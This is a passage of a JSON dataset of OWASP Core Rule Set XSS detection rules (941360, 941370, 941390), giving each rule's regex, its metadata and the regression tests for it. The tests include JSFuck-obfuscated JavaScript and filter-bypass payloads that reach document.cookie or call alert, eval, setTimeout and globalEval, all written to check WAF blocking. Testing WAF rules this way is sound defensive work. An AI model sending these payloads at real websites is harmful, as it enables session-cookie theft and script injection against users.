"a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" }, "expected": { "should_block": true, "rule_ids": [ 941360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" } ] }, { "description": "JSFuck / Hieroglyphy payload obfuscation attack", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=(![]+[])[+!+[]]" }, "expected": { "should_block": true, "rule_ids": [ 941360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=(![]+[])[+!+[]]" } ] }, { "description": "JSFuck / Hieroglyphy payload obfuscation attack", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=+!![]" }, "expected": { "should_block": true, "rule_ids": [ 941360 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=+!![]" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 677, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "![!+ ]\\[\\]", "actions": [ { "act_name": "id", "lineno": 678, "act_quote": "no_quote", "act_arg": "941360", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 679, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 680, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 681, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 682, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 683, "act_quote": "quotes", "act_arg": "JSFuck / Hieroglyphy obfuscation detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 684, "act_quote": "quotes", "act_arg": "Matched Data: Suspicious payload found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 685, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 686, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 687, "act_quote": "quotes", "act_arg": "attack-xss", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 688, "act_quote": "quotes", "act_arg": "xss-perf-disable", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 689, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 690, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 691, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-XSS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 692, "act_quote": "quotes", "act_arg": "capec/1000/152/242/63", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 693, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 694, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 695, "act_quote": "quotes", "act_arg": "tx.xss_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 696, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 677 } }, { "rule_id": "941370", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?:self|document|this|top|window)\\s*(?:/\\*|[\\[)]).+?(?:\\]|\\*/)", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "compressWhitespace" ], "metadata": { "phase": "2", "message": "JavaScript global variable found", "logdata": "Matched Data: Suspicious JS global variable found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-xss" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "attack-xss", "xss-perf-disable", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-XSS", "capec/1000/152/242/63" ] }, "test_cases": [ { "description": "Bypass using comment in syntax and multiple whitespaces", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=document+%2F%2Afoo%2A%2F+.+++++cookie" }, "expected": { "should_block": true, "rule_ids": [ 941370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=document+%2F%2Afoo%2A%2F+.+++++cookie" } ] }, { "description": "Bypass using comments in syntax", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" }, "expected": { "should_block": true, "rule_ids": [ 941370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" } ] }, { "description": "Bypass using JavaScript global variables", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" }, "expected": { "should_block": true, "rule_ids": [ 941370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" } ] }, { "description": "Bypass using JavaScript global variables and comments in syntax", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" }, "expected": { "should_block": true, "rule_ids": [ 941370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" } ] }, { "description": "Bypass using JavaScript global variables and string concatenation", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" }, "expected": { "should_block": true, "rule_ids": [ 941370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" } ] }, { "description": "Bypass using JavaScript global variables and comments in syntax", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" }, "expected": { "should_block": true, "rule_ids": [ 941370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" } ] }, { "description": "Bypass using JavaScript global variables and jQuery globalEval", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" }, "expected": { "should_block": true, "rule_ids": [ 941370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" } ] }, { "description": "Bypass using JavaScript global variables and hex escape sequence", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=self%5B%22%5Cx24%22%5D" }, "expected": { "should_block": true, "rule_ids": [ 941370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=self%5B%22%5Cx24%22%5D" } ] }, { "description": "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=%28document%29%5B%22cookie%22%5D" }, "expected": { "should_block": true, "rule_ids": [ 941370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=%28document%29%5B%22cookie%22%5D" } ] }, { "description": "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" }, "expected": { "should_block": true, "rule_ids": [ 941370 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=%28document%2F%2Afoo%2A%2F%29%5B%22cookie%22%5D" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 706, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?:self|document|this|top|window)\\s*(?:/\\*|[\\[)]).+?(?:\\]|\\*/)", "actions": [ { "act_name": "id", "lineno": 707, "act_quote": "no_quote", "act_arg": "941370", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 708, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 709, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 710, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 711, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 711, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 711, "act_quote": "no_quote", "act_arg": "compressWhitespace", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 712, "act_quote": "quotes", "act_arg": "JavaScript global variable found", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 713, "act_quote": "quotes", "act_arg": "Matched Data: Suspicious JS global variable found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 714, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 715, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 716, "act_quote": "quotes", "act_arg": "attack-xss", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 717, "act_quote": "quotes", "act_arg": "xss-perf-disable", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 718, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 719, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 720, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-XSS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 721, "act_quote": "quotes", "act_arg": "capec/1000/152/242/63", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 722, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 723, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 724, "act_quote": "quotes", "act_arg": "tx.xss_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 725, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 706 } }, { "rule_id": "941390", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "REQUEST_FILENAME", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:eval|set(?:timeout|interval)|new[\\s\\x0b]+Function|a(?:lert|tob)|btoa|(?:promp|impor)t|con(?:firm|sole\\.(?:log|dir))|fetch)[\\s\\x0b]*[\\(\\{]", "negated": false } }, "transformations": [ "none", "htmlEntityDecode", "jsDecode" ], "metadata": { "phase": "2", "message": "Javascript method detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-xss" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-nodejs", "attack-xss", "xss-perf-disable", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-XSS", "capec/1000/152/242" ] }, "test_cases": [ { "description": "JavaScript method setInterval(code, 1)", "test_id": 1, "request": { "method": "GET", "uri": "/get?arg=setInterval%28code%2C%201%29", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941390 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg=setInterval%28code%2C%201%29" } ] }, { "description": "JavaScript method: arg=x\";setTimeout(name, 1)//", "test_id": 2, "request": { "method": "GET", "uri": "/get?arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941390 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg=x%22%3BsetTimeout%28name%2C%201%29%2F%2F" } ] }, { "description": "JavaScript method eval('2 + 2')", "test_id": 3, "request": { "method": "GET", "uri": "/get?arg=eval%28%272%20%2B%202%27%29", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941390 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg=eval%28%272%20%2B%202%27%29" } ] }, { "description": "JavaScript constructor new Function()", "test_id": 4, "request": { "method": "GET", "uri": "/get?arg=new%20Function%28%29", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941390 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg=new%20Function%28%29" } ] }, { "description": "JavaScript call alert", "test_id": 5, "request": { "method": "GET", "uri": "/get?arg=alert%28%29", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941390 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg=alert%28%29" } ] }, { "description": "JavaScript call atob", "test_id": 6, "request": { "method": "GET", "uri": "/get?arg=atob%28%29", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941390 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg=atob%28%29" } ] }, { "description": "JavaScript call btoa", "test_id": 7, "request": { "method": "GET", "uri": "/get?arg=btoa%28%29", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941390 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg=btoa%28%29" } ] }, { "description": "JavaScript call prompt", "test_id": 8, "request": { "method": "GET", "uri": "/get?arg=prompt%28%29", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941390 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg=prompt%28%29" } ] }, { "description": "JavaScript call confirm", "test_id": 9, "request": { "method": "GET", "uri": "/get?arg=confirm%28%29", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 941390 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg=confirm%28%29" } ] }, { "description": "Known False positive:\nMatching `import (` in `if you’re willing to import (and perhaps wait around`\n", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>", "User-Agent": "OWASP CRS test agent" }, "data": "fp=If you’re looking for a personal recommendation, if you’re willing to import (and perhaps wait around, as they often sell out line has been consistently excellent so far." }, "expected": { "should_block": true, "rule_ids": [ 941390 ] }, "malicious_patterns": [ { "location": "post_body", "value": "fp=If you’re looking for a personal recommendation, if you’re willing to import (and perhaps wait around, as they often sell out line has been consistently excellent so far." } ] }, { "description": "True Positive:\nDetect import method with curly brackets\n", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.>", "User-Agent": "OWASP CRS test agent" }, "data": "code=import { sayHi, sayBye } from \"./greeting.js\";" }, "expected": { "should_block": true, "rule_ids": [ 941390 ] }, "malicious_patterns": [ { "location": "post_body", "value": "code=import { sayHi, sayBye } from \"./greeting.js\";" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 739, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:eval|set(?:timeout|interval)|new[\\s\\x0b]+Function|a(?:lert|tob)|btoa|(?:promp|impor)t|con(?:firm|sole\\.(?:log|dir))|fetch)[\\s\\x0b]*[\\(\\{]", "actions": [ { "act_name": "id", "lineno": 740, "act_quote": "no_quote", "act_arg": "941390", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 741, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 742, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 743, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 744, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 744, "act_quote": "no_quote", "act_arg": "htmlEntityDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 744, "act_quote": "no_quote", "act_arg": "jsDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 745, "act_quote": "quotes", "act_arg": "Javascript method detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 746, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", 